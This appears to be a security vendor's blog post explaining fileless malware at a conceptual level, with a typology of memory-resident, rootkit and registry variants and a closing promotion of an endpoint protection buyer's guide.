Fileless Malware—Is It Any Worse than Traditional Attack Vectors?
Companies are already having a hard enough time protecting their networks and identifying breaches. With average time to detect at nearly 100 days and 200 days for financial services firms and retailers, respectively, it’s clear that security professionals have their hands full.
And yet, cyber attackers continue to up their games as they find new ways to compromise your network. If you’re relying on old antivirus software, you might not be able to keep up.
One emerging attack vector is fileless malware—but what is it and is it worse than typical malware?
Fileless Malware Is Pretty Much What It Sounds Like
It may seem obvious, but fileless malware is just that—malware that doesn’t copy any files to your system to execute. Instead, payloads are injected directly into the memory of running processes and the malware executes in your RAM.
This is particularly problematic because your typical antivirus software relies on the files that malware places on your hard drive. Rather than being able to analyze the hard drive and quarantine/remove malicious files, fileless malware adds a new layer of stealth for attackers because it can execute directly.
However, the defining features of fileless malware don’t have to be so strict. That is, these kinds of attacks could potentially look like the phishing/spam campaigns that we’ve all grown so used to.
In an example from earlier this year, attackers launched a spam campaign that delivered malicious Word documents that executed macros when opened, delivering fileless malware in the process. In cases like this, fileless refers to the fact that attackers leverage Windows PowerShell to load an executable file directly into memory rather than writing it to the disk (where it can be detected by average malware scanners).
Here are three types of malware that can leverage fileless capabilities to improve the ability to avoid detection:
- Memory-resident malware: By using the memory space of a real Windows file, attackers can load malicious code that lies dormant until activated. The fileless aspect is that the malware can’t be detected by standard file-scanning antivirus software.
- Rootkits: Because rootkits exist on the kernel rather than in a file, they have powerful abilities to avoid detection. They are 100% fileless, but fit into this category as it evolves.
- Windows Registry malware: Like in the example mentioned above, these attacks takes advantage of the Windows Registry database that stores low-level settings for various applications. The malware relies on code executed through a file, but this file is set to self-destruct after execution, allowing the malware to persist as fileless.
Fileless Malware Points to a Greater Cybersecurity Problem
The real implications of fileless malware are apparent on the forensics side of the attack equation. Because they don’t write to a disk, forensics experts will have a much more difficult time reconstructing attacks from these kinds of malware.
Signature-based solutions could still work for fileless malware, but you have to be aware of the bigger picture problem that these emerging vectors point to. Rather than modifying aging systems and solutions to possibly address fileless malware, we need to realize that advanced attacks and ransomware threats could soon incorporate fileless characteristics (if they haven’t already).
Rather than hoping your employees will be vigilant against any suspicious emails or keep their machines 100% patched, invest in the next generation of endpoint protection and get ahead of the fileless malware problem. Download our free Next Generation Endpoint Protection Buyer’s Guide to learn more.
Reversing Malware on macOS
Endpoint Protection Platform Free Demo